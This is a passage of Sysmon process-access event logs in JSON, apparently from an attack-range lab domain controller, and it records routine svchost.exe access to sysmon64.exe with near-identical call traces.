05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 